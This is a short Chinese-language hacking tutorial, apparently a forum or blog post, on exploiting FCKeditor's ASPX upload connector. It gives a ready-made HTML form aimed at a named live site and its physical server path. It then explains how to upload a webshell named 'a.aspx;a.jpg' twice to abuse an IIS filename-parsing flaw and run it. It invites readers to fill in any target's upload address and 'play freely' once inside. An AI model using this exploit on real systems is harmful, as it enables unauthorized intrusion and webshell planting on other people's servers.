<form id="frmUpload" action=http://web.qhwins.com/site/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=E:/webroot/web.qhwins.com/admin/ target="eRunningFrame" method="post" enctype="multipart/form-data">
        File Upload<br />
        <input id="txtFileUpload" type="file" name="NewFile" />
        <input type="submit" value="Upload"  />
</form>
 

原理：FCKEDITOR中，有个connector.aspx文件，是用来处理上传请求的，而这个文件可以接受客户端请求时发出的参数，以确定是创建目录，还是上传文件等。悲催的是，这个页面程序没有对提交来源进行判断，所以给了我们本地提交的机会，而且可以自己构造上传路径，这样我们就有得玩了，嘻嘻~~ ，本文发表于：西宁威势电子信息服务有限公司，转载请注明出处，谢谢大家合作。在客户端提交的时候，我们可以直接写WEB的物理路径，这样我们就可以为所欲为的上传文件到任意目录了。关于如何取得WEB目录，不是本文讨论的重点。我们可以用这段代码，轻易的在服务器上搞上去一个类似：a.aspx;a.jpg 这样的文件，然后再利用WINDOW IIS 文件名解析漏洞，执行WEBSHELL

利用方法： 将上面的代码保存成UP.HTML，然后ACTION中写上你要攻击目标的上传地址，注意，有些管理员是给页面加了登录验证的，这样的你自己搞定，别来问我，我们只讨论没有加验证的情况。保存完以后自己把WEBSHELL的名字改成A.ASPX;A.JPG，连续上传两次，就可以得到一个 a.aspx;a(1).jpg 这样的马儿，这就是为什么要连续上传两次的原因，然后登录进去，尽情的玩~

文章完。作者：老鬼